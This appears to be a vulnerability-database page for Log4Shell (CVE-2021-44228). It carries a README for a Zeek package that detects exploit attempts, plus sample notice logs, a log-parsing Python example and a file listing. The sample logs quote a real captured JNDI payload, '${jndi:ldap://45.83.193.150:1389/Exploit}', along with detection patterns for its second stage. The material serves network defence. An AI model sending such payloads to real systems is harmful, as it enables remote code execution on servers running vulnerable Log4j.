Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Log4j Exploit Detection Logic for Zeek
Readme
# CVE-2021-44228
A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J
(CVE-2021-44228) attempts.
- Detects payload contained in HTTP headers: See [Simplifying Detection of
Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for
details.
- [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when a Java file is
returned during an LDAP search. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for
details.
- Detects when second stage Java Class is downloaded, regardless of payload and first stage detection. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details.
## Installation
`$ zkg install cve-2021-44228`
Use against a pcap you already have:
`$ zeek -Cr scripts/__load__.zeek your.pcap`
If you install from a `git clone`'d version of the repository, note that it
defaults to the development branch. Install from `master` or a release for a
more stable version of the package.
## Options and notes:
- `CVE_2021_44228::log` determines if the `log4j` log is generated. Defaults to `T`.
- `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s to ignore. It is a `set[string]`, so both IPs and domains can be ignored.
- `CVE_2021_44228::ignorable_orig_hosts` is a set of `addr`s (originators) from known benign scanners that can be ignored.
- `CVE_2021_44228::ignorable_resp_hosts` is the same as above, but for responder (`resp`) addresses.
- `CVE_2021_44228::try_normalize` determines if normalizing the payload should be attempted. Defaults to `T`.
## Example Notices
This package generates three distinct notices:
1. `LOG4J_ATTEMPT_HEADER`
1. `LOG4J_LDAP_JAVA`
1. `LOG4J_JAVA_CLASS_DOWNLOAD`
`LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data. These are also logged to `log4j` if enabled.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
```
`LOG4J_LDAP_JAVA` detects LDAP downloading Java bytecode. In practice, we see
this happen infrequently enough that it makes for a good proxy detection for
possibly successful exploits.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-16-20-54-13
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-16-20-54-13
```
Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident
that Java downloads more Java. As above, this happens sufficiently rarely to be
a useful proxy detection.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open XXXX-XX-XX-XX-XX-XX
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
#close 2021-12-126-19-17-58
```
## Example Log (`log4j.log`)
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-14-11-50-29
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T
#close 2021-12-14-11-50-29
```
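To show how the `log4j.log` and `notice.log` output above can be consumed, and to make the three ignore options from the "Options and notes" section concrete, here is a small header-driven parser for Zeek ASCII logs with a filter that applies the ignore lists to the parsed records. This is an added example, not code from the cve-2021-44228 package: the two sample logs are copied from this README (the `LOG4J_ATTEMPT_HEADER` notice line and the `log4j.log` line), the ignore lists are constructed, the `is_ignorable` and `surviving_hits` helpers are hypothetical, and exact-match membership is an assumption about how the options behave.

```python
"""Parse Zeek ASCII logs of the shape shown above and apply the package's
ignore-list options to the parsed records. Added example, not code from the
cve-2021-44228 package: the two sample logs are copied from this README, the
ignore lists are constructed, and exact-match membership is assumed."""
import ipaddress
import re

# Sample log4j.log from the README (columns are tab-separated, as in Zeek).
SAMPLE_LOG4J_LOG = "\n".join([
    "#separator \\x09", "#set_separator\t,", "#empty_field\t(empty)",
    "#unset_field\t-", "#path\tlog4j", "#open\t2021-12-14-11-50-29",
    "#fields\tts\tuid\thttp_uri\turi\tstem\ttarget_host\ttarget_port\tmethod"
    "\tis_orig\tname\tvalue\tmatched_name\tmatched_value",
    "#types\ttime\tstring\tstring\tstring\tstring\tstring\tstring\tstring"
    "\tbool\tstring\tstring\tbool\tbool",
    "1639350256.733555\tCp7gaS3nVqVl49obpb\t/\t45.83.193.150:1389/Exploit"
    "\t45.83.193.150:1389\t45.83.193.150\t1389\tGET\tT\tAUTHORIZATION"
    "\tBearer ${jndi:ldap://45.83.193.150:1389/Exploit}\tF\tT",
    "#close\t2021-12-14-11-50-29",
])

# Sample notice.log (the LOG4J_ATTEMPT_HEADER line) from the README.
NOTICE_FIELDS = ("ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type "
                 "file_desc proto note msg sub src dst p n peer_descr actions email_dest "
                 "suppress_for remote_location.country_code remote_location.region "
                 "remote_location.city remote_location.latitude remote_location.longitude")
NOTICE_TYPES = ("time string addr port addr port string string string enum enum string "
                "string addr addr port count string set[enum] set[string] interval "
                "string string string double double")
NOTICE_ROW = [
    "1639350256.733555", "Cp7gaS3nVqVl49obpb", "154.65.28.250", "57932", "172.16.4.58",
    "80", "-", "-", "-", "tcp", "CVE_2021_44228::LOG4J_ATTEMPT_HEADER",
    "Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for "
    "sample of payload, original_URI and list of server headers",
    "uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, "
    "payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header "
    "name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}'",
    "154.65.28.250", "172.16.4.58", "80", "-", "-", "Notice::ACTION_LOG", "(empty)",
    "3600.000000", "-", "-", "-", "-", "-",
]
SAMPLE_NOTICE_LOG = "\n".join([
    "#separator \\x09", "#set_separator\t,", "#empty_field\t(empty)",
    "#unset_field\t-", "#path\tnotice", "#open\t2021-12-14-11-50-29",
    "#fields\t" + "\t".join(NOTICE_FIELDS.split()),
    "#types\t" + "\t".join(NOTICE_TYPES.split()),
    "\t".join(NOTICE_ROW), "#close\t2021-12-14-11-50-29",
])


def _decode_escapes(raw):
    """Zeek writes the separator as a \\xNN escape on the #separator line."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), raw)


def _convert(typ, raw, unset, empty, set_sep):
    """Turn one column into a Python value according to its #types entry."""
    if raw == unset:
        return None
    if typ.startswith(("set[", "vector[")):
        inner = typ[typ.index("[") + 1:-1]
        items = [] if raw == empty else [
            _convert(inner, v, unset, empty, set_sep) for v in raw.split(set_sep)]
        return set(items) if typ.startswith("set[") else items
    if raw == empty:
        return ""
    if typ == "bool":
        return raw == "T"
    if typ in ("count", "int", "port"):
        return int(raw)
    if typ in ("time", "double", "interval"):
        return float(raw)
    if typ == "addr":
        return ipaddress.ip_address(raw)
    return raw  # string, enum and anything else stay as text


def parse_zeek_log(text):
    """Parse a Zeek ASCII log into a list of dicts keyed by the #fields names."""
    sep, set_sep, unset, empty = "\t", ",", "-", "(empty)"
    fields, types, records = [], [], []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#separator "):
                sep = _decode_escapes(line[len("#separator "):])
                continue
            key, *vals = line[1:].split(sep)
            if key == "fields":
                fields = vals
            elif key == "types":
                types = vals
            elif key == "set_separator":
                set_sep = vals[0]
            elif key == "unset_field":
                unset = vals[0]
            elif key == "empty_field":
                empty = vals[0]
            continue
        cols = line.split(sep)
        if len(cols) != len(fields) or len(fields) != len(types):
            raise ValueError("column count does not match the #fields/#types header")
        records.append({f: _convert(t, c, unset, empty, set_sep)
                        for f, t, c in zip(fields, types, cols)})
    return records


def is_ignorable(rec, ignorable_target_hosts=(), ignorable_orig_hosts=(),
                 ignorable_resp_hosts=()):
    """Apply the three ignore options to one parsed record (hypothetical helper).

    target hosts compare as strings (IP or domain); orig/resp hosts compare as
    addresses, matching the set[string] vs set[addr] types of the options.
    """
    orig_set = {ipaddress.ip_address(h) for h in ignorable_orig_hosts}
    resp_set = {ipaddress.ip_address(h) for h in ignorable_resp_hosts}
    return (rec.get("target_host") in set(ignorable_target_hosts)
            or rec.get("id.orig_h") in orig_set
            or rec.get("id.resp_h") in resp_set)


def surviving_hits(text, **ignore):
    """Parse a log and keep only the records not covered by the ignore options."""
    return [r for r in parse_zeek_log(text) if not is_ignorable(r, **ignore)]
```

`parse_zeek_log` reads the `#separator`, `#set_separator`, `#unset_field` and `#empty_field` headers rather than hard-coding them, so the same function handles `log4j.log` (where `target_port` is typed `string`) and `notice.log` (where `actions` is a `set[enum]` and `email_dest` an empty set). Note that the `log4j.log` rows carry no `id.orig_h`, so the originator and responder ignore lists can only be applied to the notice records.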
## References
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
1. https://corelight.com/blog/simplifying-detection-of-log4shell
File Snapshot
[4.0K] /data/pocs/6fe6a5fe26737b3ac84fd2b13a06cb8b723b4af2
├── [1.5K] LICENSE
├── [8.6K] README.md
├── [4.0K] scripts
│ ├── [3.4K] CVE_2021_44228_java_GET.zeek
│ ├── [ 11K] CVE_2021_44228.zeek
│ ├── [ 499] ldap_java.sig
│ ├── [ 84] __load__.zeek
│ └── [8.2K] tests.zeek
├── [4.0K] testing
│ ├── [4.0K] Baseline
│ │ ├── [4.0K] log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ │ └── [ 18K] notice.log
│ │ ├── [4.0K] log4j.ldap_java
│ │ │ ├── [2.2K] notice.log
│ │ │ └── [1.2K] signatures.log
│ │ ├── [4.0K] log4j.log4j-attack
│ │ │ └── [1.7K] notice.log
│ │ ├── [4.0K] log4j.log4j-dns_exfil
│ │ │ └── [1.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-log
│ │ │ ├── [ 613] log4j.log
│ │ │ └── [ 617] log4shell.log
│ │ ├── [4.0K] log4j.log4j-user_agent
│ │ │ └── [2.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-webapp
│ │ │ └── [2.2K] notice.log
│ │ ├── [4.0K] log4j.notice
│ │ │ ├── [1015] http.log
│ │ │ └── [1.3K] notice.log
│ │ └── [4.0K] log4j.unit
│ │ └── [1.7K] output
│ ├── [ 558] btest.cfg
│ ├── [4.0K] Files
│ │ └── [ 192] random.seed
│ ├── [4.0K] log4j
│ │ ├── [ 210] 2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ ├── [ 303] ignore-orig
│ │ ├── [ 301] ignore-resp
│ │ ├── [ 307] ignore-target
│ │ ├── [ 168] ldap_java.zeek
│ │ ├── [ 168] log4j-attack
│ │ ├── [ 171] log4j-dns_exfil
│ │ ├── [ 288] log4j-log
│ │ ├── [ 172] log4j-user_agent
│ │ ├── [ 168] log4j-webapp
│ │ ├── [ 235] notice
│ │ └── [ 154] unit
│ ├── [ 28] Makefile
│ ├── [4.0K] Scripts
│ │ ├── [ 383] diff-remove-timestamps
│ │ ├── [1.3K] get-zeek-env
│ │ └── [ 303] README
│ └── [4.0K] Traces
│ ├── [4.9M] 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap
│ ├── [ 11K] log4j-attack.pcap
│ ├── [4.0K] log4j-dns_exfil.pcap
│ ├── [ 41K] log4j-user_agent.pcap
│ ├── [ 41K] log4j-webapp.pcap
│ ├── [ 87] Readme
│ └── [1.8K] spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap
└── [ 342] zkg.meta
16 directories, 45 files